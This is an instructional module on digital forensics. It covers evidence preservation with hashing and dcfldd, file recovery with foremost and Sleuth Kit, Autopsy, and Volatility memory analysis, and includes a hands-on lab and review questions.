Digital Forensics
Objectives: By the end of this topic, you will be able to…
- Properly preserve digital evidence
- Use forensic tools in Kali to analyze disks or files
- Interpret relevant information from a forensic image
- Document findings clearly and in a structured manner
Introduction to digital forensic analysis
Digital forensics is a cybersecurity discipline that identifies, preserves, analyzes, and presents digital evidence with legal validity. It is applied in cases of security incidents, fraud, intrusions, or legal investigations.
The goal of forensic analysis is not only to understand what happened, but also to preserve evidence for potential judicial use.
Evidence preservation
Before analyzing any compromised system, it is essential to preserve the integrity of the evidence:
- Forensic images (bit-for-bit) of the disk or device, using
dd,dcfldd, or Guymager - Hash calculation (MD5, SHA-1, SHA-256) before and after acquisition to verify no alteration occurred
- Use of read-only media to avoid modifying the original
- Detailed logging of every action performed (chain of custody)
Types of digital evidence
| Source | Examples |
|---|---|
| Files | Deleted documents, modified or malicious files |
| System logs | Event logs (Windows Event Logs, syslog) |
| Metadata | Creation/modification dates, author, location |
| Network/application logs | Access records, errors, connections |
| User artifacts | Browsing history, recent files, executed commands |
| RAM memory | Active processes, passwords, connections |
Forensic image analysis
Analysis is performed on an exact copy (image) of the original device:
- Full disk / partition: filesystem analysis (NTFS, ext4, FAT), recovery of deleted files, search for suspicious patterns
- RAM memory dump: identify processes, keys, connections, and volatile artifacts
- Removable devices: USB drives, SD cards that may have been used to exfiltrate data
Analysis tools
| Tool | Use |
|---|---|
| Autopsy / Sleuth Kit | Structured examination of forensic images |
| Bulk Extractor | Pattern extraction (emails, URLs, keys) |
| Binwalk / Foremost / Scalpel | File recovery and binary data analysis |
| Volatility / Rekall | RAM memory analysis |
| ExifTool | Metadata analysis |
Forensic tools in Kali Linux
Kali includes tools for performing forensic tasks without altering the evidence:
dcfldd/dd— forensic imaginghashdeep/sha256sum— integrity calculation and verificationautopsy/sleuthkit— structured analysis suiteforemost/scalpel— deleted file recoveryvolatility— RAM memory analysisstrings— readable text extraction
Kali can be booted in forensic mode (from USB), which avoids automatically mounting disks to prevent evidence alteration.
Hands-on lab
Requirements: Kali Linux, forensic image
disco.dd(provided), (optional) memory imagememoria.raw
Part 1: Evidence preservation
- Calculate the original hash:
sha256sum disco.dd- Create a working copy:
dcfldd if=disco.dd of=copia.dd hash=sha256 hashlog=hashes.txt- Confirm integrity by comparing hashes
Part 2: File extraction and analysis
Extracting deleted files:
foremost -i copia.dd -o output/Examine the output/ folder: documents, images, suspicious executables.
Filesystem analysis with Sleuth Kit:
fls -r -m / copia.dd > structure.txt
icat copia.dd <inode> > recovered_fileUse fls and istat to view hidden files, access and modification times, activity logs.
Text and metadata inspection:
strings copia.dd | lessSearch for credentials, messages, internal paths.
Part 3 (Optional): Analysis with Autopsy
- Load the image
copia.dd - Navigate the event timeline
- Search for suspicious activity (recent execution, created or deleted files)
- Use metadata analysis and automatic indexing features
Part 4 (Optional/Advanced): Memory analysis
If memoria.raw is available:
volatility -f memoria.raw imageinfo
volatility -f memoria.raw --profile=Win7SP1x64 pslist
volatility -f memoria.raw --profile=Win7SP1x64 netscan
volatility -f memoria.raw --profile=Win7SP1x64 malfindIdentify hidden processes, extract DLLs, commands used, open connections.
Submission
- Hashes and verification of the original image
- List and analysis of recovered files
- Key fragments (strings, metadata, suspicious names)
- Screenshots and key findings
- Incident hypothesis (1-2 paragraphs): what happened, who may have done it, what evidence supports the hypothesis
Key concepts
| Term | Definition |
|---|---|
| Digital forensics | Discipline that identifies, preserves, analyzes, and presents digital evidence |
| Forensic image | Bit-for-bit copy of a device for analysis without altering the original |
| Chain of custody | Documented record of actions performed on digital evidence |
| Autopsy | Graphical forensic analysis tool based on Sleuth Kit |
| Volatility | RAM forensic analysis framework |
| Hash | Function for verifying file integrity of evidence |
Test yourself
-
Preservation: Why is it critical to calculate the hash of a forensic image before and after copying? What would happen if the hashes do not match?
-
Analysis: You receive a disk image of a compromised system. Describe your analysis process step by step, from preservation to the incident hypothesis.
-
Memory: What information can you obtain from RAM analysis that is not available on the hard drive? Why is it important to capture RAM before shutting down the system?